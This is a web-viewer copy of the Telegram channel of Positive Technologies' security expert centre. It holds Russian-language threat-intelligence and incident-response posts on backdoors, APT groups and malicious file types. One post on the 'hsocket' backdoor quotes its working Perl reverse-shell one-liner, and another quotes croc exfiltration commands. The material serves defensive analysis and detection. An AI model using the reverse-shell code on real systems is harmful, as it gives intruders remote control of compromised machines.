TGViewer
Channel Public Channel
ESCalator

ESCalator

@ptescalator

Tips and tricks от команды экспертного центра безопасности Positive Technologies (PT ESC)
Subscribers
8.11K
Photos
604
Videos
6
Links
259
Recent Posts 20 shown
Post #781 6.36K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 😁 9
  • 🔥 4
  • 🐳 4
Post #780 1.59K
.exe .docm .xlsm

Вредоносные файлы с этими расширениями чаще всего встречаются в сетевом трафике компаний. Давайте базово разберемся, почему.

🖥 .exe — классическое расширение исполняемых файлов в Windows: двойной клик — и у вас запускается Fortnite (не осуждаем), браузер, ваш любимый мессенджер, установщик или любая другая программа. А может запуститься и Trojan или какой-нибудь другой вредонос.

Чаще всего вы даже не видите, что у файла именно такое расширение: по умолчанию в Windows включена функция «Скрывать расширения для зарегистрированных типов файлов», из-за чего видно только первую часть имени. И этим пользуются злоумышленники.

Например, они маскируют файл под что-нибудь безобидное: вместо zarplaty_sep_2026.pdf.exe вы увидите просто zarplaty_sep_2026.pdf. Подозрений не вызывает, а интерес пробуждает. Клац-клац — и бамц.

В общем, для самозащиты рекомендуем отключить эту функцию. Делается просто, зато вы всегда будете знать, на что именно кликаете.

📄 .docm и .xlsm — а это знакомые всем офисным работягам расширения документов Microsoft Office. Их часто перекидывают по электронной почте, чатам и флешкам, так что обычно они не вызывают подозрений.

Только что-то тут с последними буквами расширений не так — скажете вы, и будете правы. Вместо x в конце здесь стоит m, а это означает, что такие документы поддерживают макросы — небольшие программы на специальном языке VBA, которые могут выполнять действия внутри документа. Также могут попадаться расширения .dotm и .xltm — это шаблоны документов с поддержкой макросов.

И так же, как с .exe, эти расширения по умолчанию скрыты в наименовании файлов в Windows, поэтому вы просто видите иконку документа и его название.

Макросы — полезная штука, которая помогает автоматизировать рутинные действия в документах (с их помощью энтузиасты даже умудрились запустить DOOM прямо в Word).

Но ими пользуются и злоумышленники: вы открываете вроде бы обычный файл, разрешаете макросы — и на вашем компьютере выполняются заложенные в них команды. Например, они могут запустить системную команду, которая загрузит и запустит другой вредонос.

Так вот, к чему мы это решили объяснить

1️⃣ Внимательно следите за тем, что именно вы запускаете и какие разрешения даете.

2️⃣ Наши эксперты с помощью песочницы PT Sandbox проанализировали вредоносную активность, выявленную PT NAD в сетевом трафике организаций с октября 2025 года по июль 2026 года. И как раз 29% опасных файлов оказались с расширением .exe, а 26% — с расширениями Microsoft Office.

3️⃣ Как вы понимаете, эти файлы — только верхушка айсберга из вредоносов. Ниже в сетях были обнаружены и потенциально опасные инструменты, которые выглядят легитимно, различные вариации архивов и более интересные находки.

О них — в полной версии исследования на нашем сайте.

#malware
@ptescalator
  • 👍 9
  • 🔥 8
  • 🐳 3
Post #779 8.06K
TLP: POSITIVE RED №2

25 сентября проведем наш второй митап, на этот раз — в Музее криптографии (55.830677, 37.597678). Будут честные доклады без записи, живое общение и никакой воды (только пенное, снова).

Если вы аналитик SOC, специалист по реагированию и расследованию инцидентов или эксперт по исследованию и детектированию угроз, то вам точно зайдет.

Программа на вечер (встречаемся в 18:30):

🕖 19:00 — «От инфоповода до атаки: как группировки адаптируют глобальную и российскую повестку под свои операции».
Денис Казаков, специалист группы киберразведки PT ESC.

🕢 19:30 — «VantaCore: как вымогатели собирают собственный арсенал».
Александр Гантимуров, руководитель направления обратной разработки Angara MTDR.

🕣 20:30 — «История про шифровальщик, который не смог».
Дмитрий Логинов, реверс-инженер, CICADA8.

🕘 21:00 — «Follow the __report, knock knock, Remedy».
Иван Трофименко, аналитик центра мониторинга и реагирования JET CSIRT.

🕤 21:30 — обсудим томатный гозе и другие важные вопросы.

Количество мест ограничено, регистрируйтесь заранее на нашем сайте.

@ptescalator
  • 🔥 9
  • 👍 8
  • ❤ 7
Post #778 2.91K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 🔥 23
  • 👍 9
  • 👏 8
  • ❤ 3
  • ⚡ 2
  • 🫡 2
Post #777 3.16K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 🔥 46
  • ❤ 25
  • 🆒 9
  • ⚡ 6
  • ❤‍🔥 3
  • 👨‍💻 2
Post #776 2.55K
Din, din — кто там? 🔔

Группа киберразведки экспертного центра безопасности Positive Technologies обнаружила новую группировку, которую мы назвали DENOmination Group.

В 2026 году мы зафиксировали ее активность против российских организаций оборонно-промышленного, военного, финансового и консалтингового секторов.

Ключевая особенность атак — использование легитимной среды выполнения Deno для запуска вредоносного JavaScript/TypeScript-кода. В исследованных цепочках мы наблюдали загрузчик DinDoor, агент удаленного доступа DenoRAT, вредоносные MSI- и LNK-файлы, ротацию C2-инфраструктуры и несколько связанных способов первоначальной доставки.

Пересечения в кодовой базе, конфигурационных параметрах, логике построения цепочек и сетевой инфраструктуре позволили связать наблюдаемые эпизоды с активностью одной группировки.

В исследовании разобрали архитектуру DinDoor и DenoRAT, механизмы закрепления и взаимодействия с C2, инфраструктурные пересечения, TTP и возможную модель использования общей платформы несколькими операторами.

Подробности — в нашем блоге 🦖

#TI #APT #Malware
@ptescalator
  • 👍 12
  • 🔥 10
  • 🆒 6
  • ❤ 1
Post #775 2.55K
Он вам не gsocket 😑

В ходе расследования одного из инцидентов специалисты PT ESC IR наткнулись на весьма диковинный инструмент hsocket (не путать с gsocket).

После получения первоначального доступа и установки веб-шелла злоумышленники доставили на скомпрометированный веб-сервер три bash-скрипта.

1️⃣ hsocket — бэкдор, имеющий следующий функционал:

• запуск интерактивной командной оболочки

• запуск эксплойтов для повышения привилегий в Linux-системах (PwnKit, Dirty Pipe, Dirty COW, Netfilter)

• сканирование директории на наличие веб-шеллов и их удаление (вероятно, для очистки следов)

• защита файлов от удаления

• установление reverse shell-соединения с управляющим сервером с помощью кода на Perl:

perl -e "use Socket;\$i=\"$hsHOST\";\$p=$hsPORT;socket(S,PF_INET,SOCK_STREAM,
getprotobyname('tcp'));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){
open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('sh -i');};"


• скачивание и запуск скриптов для поиска ошибок в конфигурации Linux и повышения привилегий (linenum, linpeas)

2️⃣ hfsm — файловый менеджер, который позволяет интерактивно работать с файловой системой: просматривать, редактировать и удалять файлы.

3️⃣ .hsrc — устанавливает полные права на чтение, запись и исполнение файлов hsocket и hfsm, а также создаёт алиасы для запуска данных скриптов.

В рамках данного исследования нам удалось обнаружить статью, написанную на индонезийском языке, в которой было описано данное ВПО.

Что интересно, веб-шелл, установленный на скомпрометированном сервере, также содержал комментарии и строки на индонезийском:

// Fungsi untuk tampilan halaman login
$Warning = "### ⚠️Info!! Terdekteksi Aktivitas Dari";


Сам веб-шелл является модифицированной версией Gecko. Об этом говорят комментарии и характерные строки кода:

//------------------GECKO SHELL, RECODED BY AYANA--------------------//
<!-- Gecko Folder File Manager -->


IoC:

hsocket.io
/tmp/hs-data/


#ir #dfir #detect #ioc #malware
@ptescalator
  • 🔥 25
  • ❤ 9
  • 👍 9
  • 💯 1
Post #774 3.16K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 🔥 23
  • 👍 12
  • 💯 7
  • 😨 2
  • 👾 2
Post #773 3.48K
We will croc you 👻

PhantomCore продолжает активно использовать ошибки в конфигурации 1С для атак на российские организации.

Об атаках на 1С с помощью 1cshell мы писали ранее (1, 2, 3).

В рамках расследования инцидента команда PT ESC IR обнаружила компрометацию сервера 1С, работающего на операционной системе семейства Linux 🐧

Среди характерных признаков — наличие вредоносных исполняемых файлов в подкаталогах домашней директории служебного пользователя usr1cv8 и команд в .bash_history того же пользователя — в частности просмотр и удаление файла res.txt, в который записывается результат выполнения кода посредством 1cshell.

/home/usr1cv8/.bash_history: cat res.txt

/home/usr1cv8/.bash_history: rm res.txt


После получения доступа в систему PhantomCore установили ReverseSSH-туннель, что является типичным поведением для данной группировки.

🕵️‍♂️ Помимо часто используемого инструментария, мы встретили и более диковинную утилиту croc, предназначенную для удаленной загрузки и эксфильтрации файлов.

На исследуемом узле были обнаружены команды формата: CROC_SECRET=[REDACTED] ./croc

С помощью нее злоумышленники могли загрузить на скомпрометированный узел файл, который был предварительно отправлен через веб-интерфейс https://getcroc.com/ (на скриншоте) или с другого компьютера, на котором установлен croc.

💡 Для поиска следов использования croc можно поискать исполняемый файл с соответствующим именем, а также использование переменной окружения CROC_SECRET.

В качестве сетевого индикатора может служить домен getcroc.com.

#ir #tip #apt #detect #dfir
@ptescalator
  • 🔥 19
  • 🫡 11
  • ❤ 10
  • ⚡ 1
  • 🤔 1
Post #772 3.78K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 😭 13
  • 😎 7
  • 👀 4
Post #771 4.82K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 🔥 11
  • ❤ 9
  • 👏 8
  • 👍 4
Post #770 3.91K
Минус один пернатый вор — плюс сто очков рейтинга! 😵

Команда Threat Intelligence экспертного центра безопасности Positive Technologies обнаружила кампанию восточноазиатской группировки FamousSparrow. Группировка использовала новый бэкдор, который мы назвали SquawkDoor, а также новую версию известного бэкдора SparrowDoor 🏴‍☠️

Группировка встраивала вредоносные JS-скрипты на сайты из разных стран. Они показывали пользователю якобы ошибку сертификата на определенном языке и предлагали скачать новый сертификат, который являлся MSI-файлом и приводил к заражению вредоносным бэкдором.

😳 Мы проанализировали бэкдоры: подробно показали новый SquawkDoor и провели детальный анализ отличий нового SparrowDoor от старой версии, а также связанных с ними HemiGate, TernDoor и CrowDoor.

Помимо этого, мы нашли различные пересечения с другими злоумышленниками из Восточной Азии. Также в процессе анализа мы обнаружили связанного с группой пентестера, который готовил атаки.

О том, какие приложения ранее взламывал злоумышленник и какие у него фетиши — читайте в нашем блоге 😏

#TI #APT #Malware
@ptescalator
  • 🔥 23
  • 🤣 11
  • 👏 5
  • ❤ 4
  • 👍 2
Post #769 4.32K
DragonDoll: матрешка в мире Android-шпионов 🪆

В начале этой весны специалисты PT ESC обнаружили неизвестный ранее APK-файл, загруженный из Саудовской Аравии. Сам образец содержал много приемов Defense Evasion.

Для усложнения анализа было использовано:

1 техника BadPack
2 этапа загрузки нативных библиотек
1 обфускация на основе LLVM
6 проверок на выполнение в виртуальной среде
и несчитанное количество MBA-выражений

После долгих страданий этапов анализа, с помощью сил эмуляции, законов булевой алгебры и нескольких сотен строк кода наши специалисты распаковали новый Android-шпион DragonDoll 📱

В ходе исследования мы наткнулись на масштабную атаку с участием данного ВПО, направленную на пользователей Android из более чем 26 стран, включая и Россию.

Злоумышленники использовали GitHub как источник распространения и постоянного обновления DragonDoll. Ссылка на этот репозиторий привела на сеть поддельных сайтов с «обновлением» Chrome, содержание которых адаптировалось под язык жертвы.

Разбор того, что лежало под слоем обфускации — в нашем блоге ⬅️

#TI #Android #Malware
@ptescalator
  • 🔥 19
  • ❤ 6
  • 🥰 6
  • 👍 3
Post #768 3.91K
Раньше всех. Ну почти. департамента Threat Intelligence
  • 😁 30
  • 😎 4
  • 👍 3
  • ⚡ 2
  • ❤ 1
Post #767 4.49K
Едем на OFFZONE 2026

На этой неделе постов не было, зато на следующей — выступим с докладами на OFFZONE. Если будете, то заходите. А если не зайдете, то получите потом записи, но не все.

➡️ Девиртуализация Warbird с помощью LLVM / 20 августа, 14:00

Warbird — это внутренняя, официально недокументированная технология Microsoft для защиты кода и DRM. Мало кто знает, но Warbird также имеет виртуализацию, реализованную в нескольких компонентах ядра Windows: ci.dll, clipsp.sys и peauth.sys. На докладе Павел Максютин, ведущий специалист отдела экспертизы PT Sandbox, расскажет о современных подходах к девиртуализации, об устройстве виртуальной машины Warbird и как ему удалось ее сломать с помощью бинарной трансляции и LLVM.

➡️ Et tu, OpenCode: как злоумышленники атакуют агентов и выманивают ваши секреты / 20 августа, 16:10

Наступление эры агентских систем «подарило» злоумышленникам новые векторы атак на пользователей. Чего они добиваются и какие новые техники используют в отношении ассистентов и агентов, расскажет Станислав Раковский, руководитель группы Supply Chain Security. А еще будет практическая проверка того, насколько безопасно использовать ревью коммитов на основе опенсорсных и коммерческих LLM.

➡️ Дочирикались / 21 августа, 16:30

Название доклада отсылает к одной восточноазиатской группировке, которая атаковала цели в Южной Азии и Европе. Злоумышленники внедряли на взломанные легитимные сайты вредоносный JS, подменявший страницы фейковой установкой сертификата и загружавший ранее неизвестный бэкдор.

Максим Шаманов и Александр Бадаев, специалисты TI-департамента PT ESC, расскажут о серьезных OPSEC-ошибках, которые допустили злоумышленники.

Будут и другие доклады от ребят из Позитива — про них в этом посте 😠

@ptescalator
  • 👍 13
  • ❤ 9
  • 👏 5
  • 🔥 3
  • 😁 2
  • 🤩 1
  • 💩 1
Post #766 4.83K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 😁 8
  • 🤨 6
  • 👀 3
  • ❤ 1
  • 🤮 1
  • 👾 1
Post #765 5.73K
⚡Фейковые новости — В С Ё

Специалисты PT ESC обнаружили связанную между собой сеть новостных сайтов, почтовых доменов и аккаунтов в социальных сетях, которые использовались для распространения фейковых новостей.

Подавляющее большинство обнаруженных новостных ресурсов и доменов для отправки писем были зарегистрированы на один и тот же email-адрес ✉️

Сайты и аккаунты в соцсетях в основном маскировались под региональные новостные площадки, а распространяемые через них фейковые материалы часто пересекались между разными ресурсами.

Кроме того, мы обнаружили возможную связь этой инфраструктуры с группировкой Rare Werewolf. Ранее она также использовала похожую тактику на начальном этапе атак — рассылала письма без какой-либо полезной нагрузки.

Подробнее о расследовании можно прочитать в нашем блоге 🗞

#TI #APT #FakeNews #Phishing
@ptescalator
  • 👍 24
  • ❤ 16
  • 😁 12
  • 🔥 9
  • 🤣 1
  • 🤝 1
  • 🙉 1
Post #764 5.32K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 😁 24
  • 🔥 6
  • 🤡 5
  • 👏 3
  • 😱 1
Post #762 6.15K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 🔥 20
  • 👍 8
  • 😱 7
  • ❤ 4
  • 👌 1
  • 🐳 1
Post #761 4.51K

This post (sticker, poll or similar) has no web preview. Open in Telegram

  • 😁 10
  • 🔥 5
  • 💅 4
  • 🍓 3
  • ❤ 1
  • 😢 1
Older posts →

About this channel

How can I read @ptescalator without a Telegram account?
TGViewer shows the public web preview Telegram publishes for ESCalator: recent posts, photos, videos and the subscriber count, with no app, login or account.
How many subscribers does ESCalator have?
ESCalator (@ptescalator) has 8.11K subscribers on Telegram, refreshed roughly every 30 minutes.
Does ESCalator know I viewed it here?
No. Public channel previews carry no viewer identity, and TGViewer has no accounts or tracking of what you look up.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →